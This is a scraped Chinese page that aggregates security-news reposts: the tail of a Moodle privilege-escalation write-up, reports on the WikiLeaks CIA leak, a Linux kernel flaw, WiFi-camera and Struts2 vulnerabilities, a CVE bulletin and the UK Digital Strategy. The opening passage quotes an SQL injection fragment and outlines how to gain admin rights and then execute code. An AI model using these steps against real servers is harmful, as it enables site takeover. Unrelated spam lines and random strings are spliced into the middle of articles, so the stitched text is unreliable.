value=our_user_id WHERE name=site_admins — WHERE id='[ID]’现在可以清楚地看到,我们已经将表名和我们控制的第一个数据值之间的一切注释掉了。这样,我们能在UPDATE语句上使用SQL语句,而不影响SELECT语句了。
然后我们只需将配置值设置为我们想要的值,最好是我们的用户ID,然后添加我们改进的WHERE语句,根据配置名称过滤表。最后,我们添加一行注释,以删除内置的WHERE语句。我们在两个不同的查询上成功利用了相同的SQL注入。
所以,我们现在要做的是等待配置缓存刷新,这应该每天都会发生,或者只是强制刷新它自己,通过删除“allversionshash”的配置值,它存储系统中所有核心文件的SHA-1哈希值。更改此配置的值将使Moodle认为它经历了固件更新,并为我们刷新整个缓存。
获得完整的管理员权限后,执行代码就像将新插件或模板上传到服务器一样简单。
所以,在利用一些虚假的假设,一个对象注入,一个双重SQL注入和一个允许的管理员仪表板后,我们终于赢了。
0x04 修复建议
到厂商的注意下载升级补丁以修复这个安全问题:
https://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-58010
参考:netanelrub,MottoIN小编编译发布,转载请注明来自MottoIN
该文章作者已设置需关注才可以留言
微信扫一扫关注该公众号

公司应该制定信息管理相关制度和流程,规范管理信息采集、传输、交换、存储、备份、恢复和销毁等环节,加强重要数据信息控制和保护,保障信息的合法、合规使用。

猜您喜欢

西安地铁三号线电缆不影响机车安全运行与控制,将在最短时间内全…
全民网络安全意识教育策略与资源
网络安全意识动画片展播针对企业职员的社交工程诈骗电话
台语歌后结婚12年流产4次泪拒丈夫求爱
MICOEQUIPMENT ARMASSGLASS
企业安全是业务成功、法规遵循及道德建设的要求

维基解密:科技公司获得安全漏洞信息须答应几个条件

微信名称:中国信息安全博士网
微 信 号:secdoctor
请时刻关注您身边的信息安全,关注中国信息安全博士网。

【QQ密码忘记怎么办 教你找回QQ密码】

http://www.secdoctor.com
本文摘自:凤凰科技 作者:清辰编译

全国首个 网络空间安全学院成立

配图:位于纽约曼哈顿第五大道的苹果零售店
美国NSA对互联网通讯的恶意监控让全球各国政府什么担心数据和通讯的安全问题。

据《财富》杂志北京时间3月20日报道,维基解密本周接触了包括苹果和谷歌在内的多家知名科技公司,要求他们必须先答应一系列条件,然后才能收到有关中情局掌握的“零日漏洞”和其他监控手段的外泄信息。
大概一周前,维基解密创始人朱利安·阿桑奇(Julian
Assange)曾表示,他将协助科技公司修复中情局外泄文件中提到的安全漏洞。据科技网站Motherboard报道,维基解密提出的条件大多不为人所知,但可能包括必须在90天内修复其曝光的任意安全漏洞的条件。据知情人士透露,一些科技公司正在评估维基解密所提条件的法律后果。
维基解密周五晚些时候发表了一份声明,称包括火狐浏览器厂商Mozilla在内的一些机构已经决定采取行动。声明还提到了科技公司对其所谓的“符合行业标准的漏洞披露计划”反应迟缓的原因:“由于秘密为美国政府部门工作,其中大多数公司存在利益冲突”。阿桑奇最后还表示,将在下周披露更多有关这个问题的信息。
中情局文件中曝光的安全漏洞可能是经由情报机构承包商传递到维基解密手中的,其中包括用于渗透安卓智能手机、iPhone、桌面操作系统、路由器和网络浏览器的方法。“零日漏洞”(Zero
day)是指黑客部署的恶意软件和其他攻击手段,企业会以更新或补丁的形式来修复这一漏洞。涉及的企业包括微软、思科、中兴、华为等。
然而,维基解密公开的文件并不包括安全漏洞的代码或完整技术细节。近年来,大型科技公司与情报机构的关系很紧张,因为之前媒体曝光的监控项目使得他们不得不采取措施打消用户疑虑,令其相信他们的设备是安全的,不会受到情报机构监控。例如,苹果就表示它已经修复了中情局外泄文件中提到的多处安全漏洞。不过,中情局外泄文件中称苹果产品中存在十多处尚未修复的“零日漏洞”。
CISDC2017
征文通知
长按此二维码,识别二维码分享至朋友圈

【第881期】Hybrid 开发:JsBridge – Web和客户端的桥

★收看更多请点击屏幕最下方,左下角☞阅读原文。
山西焦化:关于2017年度与关联方日常关联交易预测的公告
该文章作者已设置需关注才可以留言
微信扫一扫关注该公众号

“道高一尺,魔高一丈”,为了应对各类新出现的安全威胁,我们的各种安全控制措施也总在不断地改进之中,我们也时常教育用户:要及时了解相关的安全特性和更新必要的安全配置,使我们变得更加强大,以便更好地保护好自己。

猜您喜欢

安全意识宣传——如何选择安全的密码
21世纪网的教训——上市公司如何应对不良媒体
EHS在线课程,让全体员工和其他相关方轻松理解并遵照执行EHS方针
蓝宇CP发糖!胡军49岁生日派对合影刘烨关锦鹏
LKO IMPLANTORALSURGEONS
信息安全意识公开课提升国民网络素养

潜伏7年的Linux内核漏洞曝光?!!无权限也能发动攻击

“人脸识别”有漏洞?专家认为生物特征数据被盗

互联网的创新让组织受益,新的技术可能是业务成功的驱动力,我们的信息安全管理人员应该主动及时了解这些创新技术中的各类风险,趋利避害,在享受新技术带来的回报时,部署和实施必要的风险控制措施降低可能带来的损失。
又一个古老的Linux内核漏洞被曝光!
这次的漏洞可以追溯到2009年,影响的linux发行版包括Red Hat、Debian、Fedora、OpenSUSE和Ubuntu。
这个Linux漏洞编号为CVE-2017-2636,根据CVSS v3标准漏洞评分为7.8分。漏洞在Linux内核已经存在7年了,它能够让本地无权限的用户获取root权限,或者发动DoS让系统崩溃。
40分钟去化9成 金融街·花溪小镇万元笋盘千人抢
Positive Technologies的研究员Alexander Popov发现了存在于N_HLDC linux内核驱动的竞争条件问题。这个内核驱动负责处理高级数据链路控制(High-Level Data Link Control或简称HDLC)数据。问题导致了double-free漏洞。
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free,其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞。
这是CVE-2017-2636的声明,该漏洞即N_HLDC (drivers/tty/n_hdlc.c) linux内核驱动中的竞争条件。这个漏洞可以用来进行本地提权。”SecList的安全公告提到。“该驱动提供HDLC串行线路规程,这是很多linux发行版中的内核模块——只要是内核设置中有CONFIG_N_HDLC=m的linux发行版。要利用这个漏洞不需要Microgate或者SyncLink硬件。当没有权限的用户打开伪终端并且调用TIOCSETD ioctl函数设置HDLC串行线路规程的时候,模块就会自动加载。”
因此未经授权的攻击者可以利用这个漏洞注入执行任意代码。
影响范围
这个漏洞影响的范围涵盖大多数主流的Linux发行版,包括Red Hat Enterprise Linux 6, 7, Fedora, SUSE, Debian和Ubuntu。
由于漏洞可以追溯至2009年7月,那些Linux设备存在漏洞长达7年了,但是根据Positive Technologies的调查,很难确定漏洞是否已经被利用过。

“漏洞非常老,所以在Linux工作站和服务器中传播广泛。”Popov说道,“要想利用漏洞,攻击者只需要没有权限的普通用户就行了。另外,攻击不需要任何特殊的硬件。”
研究人员在用syzkaller fuzzer进行系统调用测试的时候发现了这个漏洞。syzkaller fuzzer是由Google开发的代码安全审计软件。

西城区教育信息中心部署亚信安全Deep Security强化虚拟化防毒平…

Popov于是在2017年2月28日将漏洞细节、exp原型和补丁上报给了kernel.org。Popov称会在之后公布PoC。
修复建议
该漏洞目前已经修复,更新和漏洞详情将尽快公布,建议用户尽快下载安全更新。如果暂时无法安装更新,建议手动关闭n_hdlc模块。

新型网络诈骗:用”蚂蚁花呗”套现却遭连环骗

该文章作者已设置需关注才可以留言
微信扫一扫关注该公众号

信息安全宣传手册可以用朗朗上口的语句,配以形象生动的漫画,深入浅出地告诉用户什么是信息安全,信息安全认识误区,严禁的信息安全行为等等。

猜您喜欢

全员安全意识培训搞不好,二级三级再多级也没用
商业间谍与黑客参与搜索专利大战 APT攻击让提升员工信息安全意识
针对普通员工的环境和职业健康安全管理体系在线教程
秀山:石堤赏古镇美景品当地美食
ANDROIDGEEK BBURROUGHS
确保公司商业安全之道

维基解密说会帮科技公司解决漏洞 可后者并不买账

维基解密(WikiLeaks)创始人朱利安阿桑奇昨天做出承诺,说要跟苹果、Google、微软、思科等知名科技公司分享美国中央情报局CIA使用黑客工具入侵它们的操作系统的方法和技术细节。从而帮助它们解决系统漏洞。
本周二,维基解密在公布的数千份文件中向全世界证实,CIA的多个下属部门利用了Android、iOS、Windows等流行操作系统中的漏洞,确保植入其中的一系列特殊程序不被发现,从而对目标设备进行监控。
受影响的除了iPhone、各个品牌型号的Android手机和Windows电脑,还包括三星/LG的智能电视、运行着思科系统的路由器等设备。
从规模来看,理论上CIA的静默监控和精准定向能力可以覆盖到地球上的绝大部分联网设备。
不过,按照苹果、Google、微软官方声明的说法,这批文件中提及的大部分漏洞主要存在于老版本系统中,现在已经通过系统升级和打补丁的方式被修复了。
受益于非常方便的OTA自动升级机制,全世界有大约80% 的iPhone和iPad运行着最新的iOS系统,用户基本不会受到CIA动作的影响。

去哪儿网订机票后遭遇电信诈骗 用户质疑泄露信息

相比之下,Android系统的碎片化问题虽然还是很严重,但Google每个月都会推送安全更新,深度定制Android系统的手机厂商也会陆续跟进。
对于维基解密伸过来的橄榄枝,这些科技公司的反应都比较冷淡。
微软的一位发言人表示,维基解密披露的安全问题已经在新版Windows系统中解决掉了,而且目前并没有人主动联系他们。
对于CIA来说,他们当然不愿意科技公司详细了解系统自身的漏洞和监控软件的工作方式。
而维基解密虽然有不错的系统安全和攻防能力,但他们对大规模漏洞的捕捉和洞察常常是事后的,无法做到提前干预。
数字权利保护组织Access Now表示,中情局不公布这些安全漏洞的详细信息,对人权网络安全造成了巨大影响。
曾在英国情报组织政府通信总部(GCHQ)担任顾问的阿兰·伍德华(Alan Woodward)则认为,公众应该为维基解密公开的这些信息感到“鼓舞”。
黑客们经常将一些被控制的网站的访问重定向到兜售廉价商品的网站,借创造流量来赚钱。
他说,这批泄露的文件大部分是关于定点入侵的,不是大规模监控,也不是获取大量设备的数据然后大海捞针。
如果维基解密拥有CIA这些行动所使用的程序代码,并将它们和盘托出,很可能会让不受控制的黑客有机可乘,从而造成实在的安全风险。

保密法宣传课
这跟CIA在这次维基解密事件中为自己辩解的逻辑有些相似。为了国家安全,CIA需要获得特许令之后才能监控某个指定的设备或目标。
人们对这类情报及安全机构有所信任的原因之一,是他们守法而且可控。
这个观点虽然能获得一部分人的认同,但这并不能平息全世界关于隐私保护和公共安全的争论。
对于普通用户来说,及时升级系统、打好补丁,定期更换密码仍然是保护自己的必要手段。

湖北鄂州供电公司深入推进安全文化建设

本文转自“网易科技新闻”,由“集沙成塔”专栏整理。

研华嵌入式工控机ARK-3500报价6500元

长按识别以下二维码关注“集沙成塔订阅中心”,获得更多每日热门资讯!
微信扫一扫关注该公众号

网络无国界,要实现互联网安全,必须进行全球跨国合作,所有的利益相关者要紧密合作,要建立全球标准化的在线法规遵循机制,唯有这样,才可能惩罚那些跨国界的罪犯集团,进而维护全球互联网的健康发展。

猜您喜欢

信息安全面面观|笑谈科学
谈谈IPv6带来的安全挑战及应对之策
网络信息安全好歌曲
全国检察已提起公益诉讼15件
CHICAGOREADER VFTVHOUSTON
EHS工作“管理要借力”

资讯|外媒称20万中国产WiFi摄像头曝漏洞存被黑客入侵风险

随着消费市场的兴起,家用摄像头逐渐成为家庭安防的主要方式之一,但网络安全漏洞的存在,容易导致个人家庭生活隐私被泄露,同样存在被黑客入侵的风险。

加强安全隐患防范意识 助力滑雪场所健康发展

据国外媒体

网络时代,教师要有与时俱进的保密意识

Camera (P2P) WIFICAM,是由一家中国厂商(目前厂名未知)所生产,并以贴牌产品的形式向多家摄像头厂商供货。
安全专家 Pierre Kim 表示,这家中国厂商提供商品的固件中就存在多个安全漏洞,导致其他公司在贴牌生产中依然保留了这些漏洞。根据调查,市面上大约有将近 1250 款贴牌摄像头型号存在安全隐患。
起初 Kim 在调查 Embedthis 软件中发现了安全漏洞,随即向软件厂商 GoAhead 发出报告,但公司方面得到的回复是这些漏洞是由中国摄像头生产商所引入的,在新版摄像头固件中添加修复补丁之前需要先修补服务的代码漏洞。
请看好互联网“后门”,多数国家政府都会强令技术公司在其服务中开设“后门”,使“监听”在线信息交流成为可能,就像窃听电话交谈那样。
据Kim 深度挖掘之后,发现摄像头共有7处安全漏洞,主要包括后门账户、预授权信息和凭证泄露、ROOT权限的预授权RCE、未认证情况下直播、Cloud等方面。并罗列了目前市场上存在这些安全隐患的 1250 多款摄像头型号列表。
《2015-2020系统集成行业发展趋势及分析》
↓↓你想要的↓↓
该文章作者已设置需关注才可以留言

两会代表共议大数据时代的个人信息安全


微信扫一扫关注该公众号
在让国民了解信息安全基础有助“中国梦”实现

客户的数据曝光,不仅影响客户的隐私,更重要的是损害自己的声誉,造成客户资源的流失和丧失未来竞争优势,所以搜集和处理客户身份信息要小心,安全保护措施要到位,从内部人员的安全意识开始。

猜您喜欢

提升安全管理绩效的不二方法
让信息安全成为商业的核心竞争力
黑客可以破解加密无线、建立假冒AP、使用ARP欺骗等等来发起中间人攻击,进而窃密和控制移动终端设备。小心啦!
尹卓:美如企图在朝鲜半岛燃起战火需考虑中俄插手
RC-NEWS MANSFIELDHIGHSCHOOL
美国制造业回归给中国企业的信息安全启示

【漏洞知识】云端出现漏洞 如何正确掌握打补丁的“时机”?

人们对“安全补丁”并不陌生,也大都有过给自己的电脑操作系统和各种软件打补丁的经历,但对于采用虚拟化与云计算的企业用户而言,补丁管理却不是一件易事。前不久的一次信息安全大会上,就有安全专家重点强调了补丁管理中的“时机”概念。
向最终用户推广信息安全意识,让他们明白和采纳基本的安全防范知识和技能,是信息安全管理人员的工作重点之一。
让我们把时间回溯到2016年 4 月 26 日,也就是4月26日Struts 2漏洞被揭露的那天。在Struts 2上发现存在高危安全漏洞(CVE-2016-3081,S02-32),Apache Struts2服务在开启动态方法调用(DMI)的情况下,可以被远程执行任意命令,该漏洞广泛影响所有struts版本。
在随后的几天里,众多企业用户开始了各种手忙脚乱的“打补丁”、库组件重新编译、弱点扫描,这不可避免的导致了Web服务、内部私有云的核心业务等大量业务陷入停顿。Apache Struts2可谓漏洞频发,可信息社会时代,哪有不存在漏洞的,正如我们昨天提到的,对漏洞就是要立即,马上,快速的解决问题。随着当晚的struts2漏洞的发布,就注定昨晚是运维和安全人员的不眠之夜了。
而在昨天,一个关于Apache Struts2的高危漏洞又出现咯!赶快去补吧!
其实,我们的观点并不是视而不见,让服务器一直暴露在危险当中,一旦遇到可能中断业务的修补程序,用户就可以采用动态的方式进行部署、尽量降低系统修补造成运营中断的机率。我们建议用户建立‘静态’和‘动态’两种方法打造新的服务器,以及前期规范的测试、安装检测流程和自动化工具。其中的重点在于自动化,因为这样才能确保您有一套可快速建立及测试新应用程序环境的操作流程。
那么,漏洞该怎么办?时间正一分一秒流逝……

ofo小黄车机械锁漏洞:记住密码可无限次免费骑车|资讯
省工商部门提醒:免费扫码打印照片有可能泄露个人信息

此时就是Virtual Patching(虚拟补丁)解决方案派上用场的时候,此项技术通过控制受影响应用程序的输入或输出,直接切断数据外泄和系统入侵的路径。它的好处有两点:一是,可以在不影响应用程序、相关库以及为其提供运行环境的操作系统的情况下,为应用程序安装补丁;二是,如果一个应用程序的早期版本已不再获得供应商支持(如Windows XP),虚拟补丁几乎是支持该早期版本的唯一方法。
在云端环境当中,不论遇到多么紧急的情况,都可以先让虚拟补丁程序来保护生产环境,然后在另外一个测试环境当中同步测试厂商提供的修补程序。
在云计算时代,安全运营模式将彻底改观,因为云端服务器是可随时抛弃的,数据才是重点。所以,传统的劳动密集型IT补丁流程必须得到改善,因为手工修补的方式不能快速地修补漏洞,甚至会导致核心业务宕机,这一缺陷在黑客利用零日(0day)漏洞大规模攻击时,会变得尤为致命。
辰罡科技全年亏损收窄至429.5万元
该文章作者已设置需关注才可以留言

渗透测试和漏洞评估的真相

微信扫一扫关注该公众号

很多企业的日常工作很难脱离开计算机而独立运行,而垃圾邮件、病毒、间谍软件和不适内容已经成为黑客入侵企业网络盗取商业机密的重要手段,这就使得安全意识薄弱的员工很容易遭受攻击,不仅直接消耗了企业带宽资源,最终会影响企业发展。

猜您喜欢

企业安全是业务成功、法规遵循及道德建设的要求
信息安全素养快速小贴士
包含灭火器使用等消防设施和器材操作的在线EHS动画培训课程
不服不行,一个苹果的Q4利润占了全球智能手机行业的92%|钛晨报
NTBYOP SAIBHARATHI
企业信息安全员工需知

【有漏洞 交补天】Struts2远程代码执行漏洞再曝威胁(文末有个小彩蛋)

背景介绍
近日,安全研究人员发现著名J2EE框架——Struts2存在远程代码执行的漏洞,Struts2官方已经确认该漏洞(S2-045),并定级为高危漏洞。
Struts2的使用范围及其广泛,国内外均有大量厂商使用该框架。
漏洞描述
该漏洞是Apache strut2 最新的一个漏洞,CVE编号CVE-2017-5638.(基于 Jakarta plugin插件的Struts远程代码执行漏洞),该漏洞会造成RCE远程代码执行,恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令,可直接造成系统被控制。黑客通过Jakarta 文件上传插件实现远程利用该漏洞执行代码。

漏洞影响
简单来说,攻击者可以通过发送恶意构造的HTTP数据包利用该漏洞,在受影响服务器上执行系统命令,进一步可完全控制该服务器,数据被恶意泄露、网站遭篡改等影响。由于Jakarta解析器安装量巨大,受影响的业务较为严重。
漏洞影响范围
Struts2.3.5 – Struts 2.3.31
Struts2.5 – Struts 2.5.10
修复建议
1.严格过滤 Content-Type 里的内容,严禁ognl表达式相关字段。
2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。
补丁地址
Struts2.3.32:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32
Struts2.5.10.1:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1
截止3月7日晚,补天平台已经收到了数千个漏洞,面对数量巨大的漏洞,补天漏洞响应平台的工作人员通宵加班确认白帽子提交的漏洞。尽快帮企业确认漏洞情况,提醒企业修复,避免漏洞被不法利用。
对于无法联系到企业负责人的漏洞,为了避免企业的损失,我们将及时上报监管单位,通知相关企业。补天平台以守护全社会网络安全为使命,从解决网络安全中的漏洞入手,助力企业安全建设。
目前已经确认近千个漏洞存在被恶意泄露的风险,并且通报厂商。
彩蛋!来了!
昨天晚上几个审核大大为了给大家快速审核,已经通宵审核了数千个洞!
软件程序员必须在软件设计流程就开始履行安全职责,事后才想起补充安全功能将花费大量的时间和精力。
面对超强度的审核量,审核团队招聘的呼声越来越高!sooooooooooo!!
数量惊人…加班中…审核等你来解救白掌门携美女运营期待中
补天漏洞响应平台,审核招聘了!!!
补天漏洞响应平台,审核招聘了!!!
补天漏洞响应平台,审核招聘了!!!
岗位要求1、熟悉常见Windows&linux、Web应用和数据库各种攻击手段;

没有安全,一切创新都是套路

2、熟悉网络安全测试方法、测试用例、漏洞判定准则;
3、了解新出台网络安全法,并且了解含义和意义;
4、有实际渗透测试经验,熟悉渗透测试各种提权方法;
安全教育日全民安全意识教育片教授海外学术交流遇谍记
5、熟悉常见脚本语言,能够进行WEB渗透测试,恶意代码检测和行为分析;
6、熟悉常见Web高危漏洞(OWASP TOP10)原理及实践,在各漏洞提交平台实际提交过高风险漏洞优先;
7、熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;
8、掌握MySQL、MSSQL、Redis、Elasticsearch等数据存储方式有了解;
9、对威胁情报和扫描器有项目经验的优先;

健全综合惩治机制 遏制网络犯罪高发态势

10、有较强的敬业精神,善于与人沟通,具有良好的团队意识,具有责任心,有服务客户意识,具有良好的抗压能力,善于处理各类突发事件,善于学习新知识,有总结规划能力;
11、需到北京当面面试。
让我们一起协同高效为网络安全贡献自己的一份力量!!
加入补天,和“白掌门”的美女团做同事咯~~~
此处应有照片,但美女团拒绝爆照,来公司见面聊(微笑脸)

智能汽车有安全漏洞:会被黑客利用

该文章作者已设置需关注才可以留言
微信扫一扫关注该公众号

资料被前员工偷窥是经常发生的事情,重要的数据可能会影响组织的市场商业竞争力,甚至长久生存。企业需要从管理和技术两个主要方面进行数据防泄露的控管。

猜您喜欢

计算机网络信息安全词汇表
高危区域的信息安全风险防范之道
保密知识第一课——准确定密并正确标识国家秘密
未来!谷歌两轮人形机器人曝光 轻松跨障碍
JIMCAIL CAMSTL
个人电脑安全基础操作指南

安全漏洞与安全事件日报

天融信安全云服务中心
安全漏洞与安全事件日报
(2017-03-05)
最新安全漏洞漏洞标题:多款Veritas产品安全特征问题漏洞提交时间:2017-03-03披露/发现时间:漏洞等级:高CVE-ID:CVE-2017-6403漏洞类别:安全特征问题CNNVD-ID:CNNVD-201703-061影响组件:Veritas NetBackup Appliance 3.0之前的版本;NetBackup Server和Client 8.0之前的版本漏洞描述:Veritas NetBackup Appliance等都是美国Veritas Technologies公司的产品。Veritas NetBackup Appliance是一款企业级备份管理设备;NetBackup Server是一套可以运行于多种操作系统中的企业级备份管理服务器。多款Veritas产品中存在安全漏洞,该漏洞源于NetBackup Cloud Storage Service连接器使用硬编码用户名和密码。攻击者可利用该漏洞查询和更改配置,并删除数据。以下产品和版本受到影响:Veritas NetBackup Appliance 3.0之前的版本;NetBackup Server和Client 8.0之前的版本。安全建议:目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:https://www.veritas.com/content/support/en_US/security/VTS17-003.html#Issue10
漏洞标题:OpenEMR 跨站脚本漏洞提交时间:2017-03-03披露/发现时间:漏洞等级:中CVE-ID:CVE-2017-6394漏洞类别:跨站脚本漏洞CNNVD-ID:CNNVD-201703-069影响组件:OpenEMR 5.0.1-dev版本漏洞描述:OpenEMR是OpenEMR社区所维护的一套开源的医疗管理系统。该系统可用于医疗实践管理、电子医疗记录、处方书写和医疗帐单申请。OpenEMR 5.0.1-dev版本中存在安全漏洞,该漏洞源于程序没有充分的过滤用户提交到‘openemr-master/gacl/admin/object_search.php’URL的数据。攻击者可利用该漏洞执行任意的HTML和脚本代码。安全建议:目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:http://www.open-emr.org/
漏洞标题:HashOver 跨站脚本漏洞提交时间:2017-03-03披露/发现时间:漏洞等级:中CVE-ID:CVE-2017-6395漏洞类别:跨站脚本漏洞CNNVD-ID:CNNVD-201703-068影响组件:HashOver 2.0版本漏洞描述:HashOver是一套免费的、开源的基于PHP的评论系统。HashOver 2.0版本中存在安全漏洞,该漏洞源于程序没有充分的过滤用户提交到‘hashover/scripts/widget-output.php’URL的数据。远程攻击者可利用该漏洞执行任意的HTML和脚本代码。安全建议:目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:https://github.com/jacobwb/hashover-next/issues/152
漏洞标题:radare2 安全漏洞提交时间:2017-03-03披露/发现时间:漏洞等级:中CVE-ID:CVE-2017-6387漏洞类别:拒绝服务漏洞CNNVD-ID:CNNVD-201703-076影响组件:radare2 1.2.1版本漏洞描述:radare2是一套用来处理二进制文件的库和工具。radare2 1.2.1版本中的libr/bin/p/bin_dex.c文件的‘dex_loadcode’函数存在安全漏洞。远程攻击者可借助特制的DEX文件利用该漏洞造成拒绝服务(越边界读取和应用程序崩溃)。安全建议:目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:https://github.com/radare/radare2/commit/ead645853a63bf83d8386702cad0cf23b31d7eeb
漏洞标题:FlightAirMap 跨站脚本漏洞提交时间:2017-03-03披露/发现时间:漏洞等级:中CVE-ID:CVE-2017-6397漏洞类别:跨站脚本漏洞CNNVD-ID:CNNVD-201703-066影响组件:FlightAirMap 1.0-beta.10版本漏洞描述:FlightAirMap是一套免费的、开源的使用PHP开发的用于显示地图上航班的应用程序。FlightAirMap 1.0-beta.10版本中存在安全漏洞,该漏洞源于程序没有充分的过滤用户提交的数据。攻击者可利用该漏洞执行任意的HTML和脚本代码。安全建议:目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:https://github.com/Ysurac/FlightAirMap/commit/363fa23c4ac3ce5011adadb65c56d8d9a699dbe3
安全资讯
英国正式出台《英国数字化战略》 附网络空间战略任务中文
本周三,英国政府正式出台《英国数字化战略(〈UK Digital Strategy〉)》,其中设定了明确途径以帮助英国在启动并推进数字化业务、试用新型技术或者实施先进技术研究方面占据优势地位,并将此作为政府计划的一部分以将英国建设为一个现代化、具备动态的全球性贸易大国。另外,这份战略报告还将确保相关举措能够立足整体经济环境、社会乃至国家带来全面收益。
英国政府已经与技术业界开始密切合作,旨在共同推进这一战略;
《英国数字化战略》翻译内容如下:
具备物理与虚拟安全保障的网络空间
让英国提供全球最为安全的在线生活与工作环境
目录
01.网络安全
02.儿童互联网安全
03.一个开放的互联网
长久以来,互联网一直在经济与社会的进步当中作为一股不容质疑的强大力量。其开放性与全球性使得互联网成为一款极为强大的自由、创新、发展与知识性工具。互联网相关技术方案在全球范围内的日益增长已经或者将会给我们这样一个互联网型社会带来巨大优势。
不过随着我们对于技术发展的日益依赖,已经有越来越多的恶意人士蓄谋入侵我们的系统与数据。应对这种威胁并确保网络空间在物理与虚拟层面的安全性是支持整个数字化经济体系的基本要求。只有确保个人与企业在网络空间内保持安全与信心,数字化带来的助益才会真正具备可持续性。
因此,我们需要确保自身技术、数据与网络方案有能力保护我们的企业、民众与公共服务。我们将继续与各国际伙伴保持合作,共同维持一个自由、开放且安全的互联网空间,从而支持我们的经济繁荣与社会福祉。我们还必须竭尽自身所能确保儿童与青少年避免暴露在网络风险当中,或者接触不当甚至有害的内容。
网络安全
于2016年11月1日发布的新《国家网络安全战略》为英国设定了发展目标,即到2021年在数字化世界中建立安全体系、适应网络威胁并营造值得信赖的发展愿景。为了实现这一愿景,我们将努力实现以下目标:

·防御:我们有能力保护英国免受不断变化的网络威胁的侵扰。我们有能力有效应对恶意事件。英国的网络、数据与系统皆应受到保护并具备恢复能力。英国公民、企业及公共部门亦具有保护自身免受网络侵害的必要知识与能力。
·阻止:英国将在网络空间中面对一切形式的恶意入侵。我们应当发现、了解、调查并阻止此类针对我们的敌对行动,同时逮捕并起诉违法人士。我们应当有能力在决定之后,立足网络空间内采取攻击性行动。
·发展:我们拥有着极具创新性且不断发展的网络安全行业,其核心支柱则为世界领先的科学研究与发展力量。我们拥有一条能够自我维持的人才输送渠道,负责提供满足我国各公共与私营部门需求的优秀人才。我们的前沿分析与专业知识亦将帮助英国顺利迎接并克服未来可能出现的种种威胁与挑战。
这些目标已经得到我们各项全球性举措的有力支持,其中包括建立合作关系以构建网络空间内的全球性演变途径。
政府用于实现上述目标的关键性战略因素包括:
·杠杆与激励机制。我们将支持初创企业并投资鼓励创新。我们亦将探索一切具备可行性的监管杠杆,包括即将发布的一般性数据保护监管(简称GDPR)政策,旨在推动整个经济体系内网络风险管理能力的改进。
·扩大情报与执法涵盖范围。各情报机构、国防部、警察与国家犯罪局将与各国际伙伴协同努力,旨在扩大对国外恶意行动者、网络罪犯及恐怖分子相关敌对性网络行为的探查、预测与阻止工作。
·技术开发与部署。 在特定行业(包括主动网络防御层面)中推动技术开发与部署以深化我们对于威胁因素的理解,强化英国公共与私营部门系统及网络的安全性水平,同时颠覆各类恶意活动。在实施之后,这些举措将能够自动抵御网络空间当中各类常见的恶意活动形式——包括高影响度、极具破坏性但复杂程度较低的网络攻击行为。
·国家网络安全中心(简称NCSC),属于国家层面网络安全领域的新型中央职能实体。其角色负责管理国家网络安全事件、提供权威意见及网络安全层面的专业知识,同时面向各政府部门、下级主管部门、监管机构及企业提供具有针对性的支持与建议。NCSC将分析、检测并了解网络威胁因素,同时提供网络安全专业知识以支持政府促进创新活动,进而支持蓬勃发展的网络安全行业并开发新型网络安全技能。
在《2015年战略性防御与安全审查》报告当中,政府承诺在未来五年内投入19亿英镑以实现上述承诺及目标。
我们还将提供国家所需要的网络技能培养通道,用以针对潜在及现有威胁实施主动保护与防御。这些举措将巩固数字化技能议程,并确保英国经济体系具备保护企业及个人免受网络威胁的必要技能与能力。我们将通过一系列极具进取性的倡议实现上述目标,具体包括:
·一项国家级课外培训计划,旨在发现最具潜力的学生并进行强化培训与辅导。计划将于2017/2018年开始,初步吸纳600名初中学生。
·建立一系列高等教育及学位级网络学员制度,并在关键性部门内建立对应计划。
·建立重新培训计划,帮助已经就职的人士转向网络安全领域。
我们还将:
·确保任何对英国国家利益造成损失的人士清楚意识到,我们能够并必将采取适当的手段予以反击,其中包括运用我们的国家进攻网络计划。
·通过与业界建立合作关系以将安全性纳入下一代互联网接入型产品与服务的开发流程,从而实现网络空间的“默认安全”属性。我们正在DCMS中建立一支项目团队以推进这方面工作。
·制定国际与多利益相关方响应机制,旨在解决多边问题、强化国际协作框架并提升合作伙伴能力以改善其网络安全保障能力。
·在网络公共部门服务与系统层面保障民众信任,确保利用适当的安全保障层级覆盖各公共部门,同时支持执法行动以保护公众安全并确保网络犯罪分子受到应有制裁。
支持企业与个人
帮助个人与企业拥有安全的网络环境无疑至关重要。
英国对于未来安全最为有力的保证之一是建立起蓬勃发展的本国网络安全行业——英国各企业将不断在网络防御领域实现创新,保证英国在网络创新领域拥有优势地位,同时在持续发展的市场中创造更多职位与财富。英国政府已经公布了一系列面向国内的举措,旨在帮助英国网络安全行业实现顺利发展,具体包括:
·在伦敦与切尔滕纳姆建立两个创新中心,用以在重要的发展初期为初创企业提供支持,同时交付一套能够切实获得高水平支持的平台。
·资助HutZero,并利用这项早期加速计划为创新者提供商业建议,帮助他们将自己的构思转化为商业化方案。
不能否认的是大多数安全事件都和内部员工有一定的关联,不管是故意的还是无意的。
·在英国各高校内启动学术初创(Academic Start-Up)计划,帮助在校创新者们实现构思商业化。
·通过DigitalCatapult(数字化弹射器)项目共享最佳实践并提供商业培训“训练营”,从而帮助英国各早期网络安全企业顺利发展。
然而,我们距离实现这一目标还有很长的路要走——有四分之一的企业表示,其曾在过去12个月当中遭遇过网络攻击,且只有22%的小型企业曾为其员工提供网络安全培训课程。因此,我们将制定并推广相关指导与计划,帮助各企业保护自身免受网络威胁之危害。我们将积极推动网络基本原则(Cyber Essentials)的普及——这项由GCHQ制定的规划将建立起基础性技术控制方案,适用于任何规模的组织机构用以保护自身免受各类常见网络攻击形式的侵扰。我们还将支持Cyber Aware(网络意识)活动等公共安全认知培训项目,旨在提升整个英国面对网络犯罪活动时的自我保护能力。
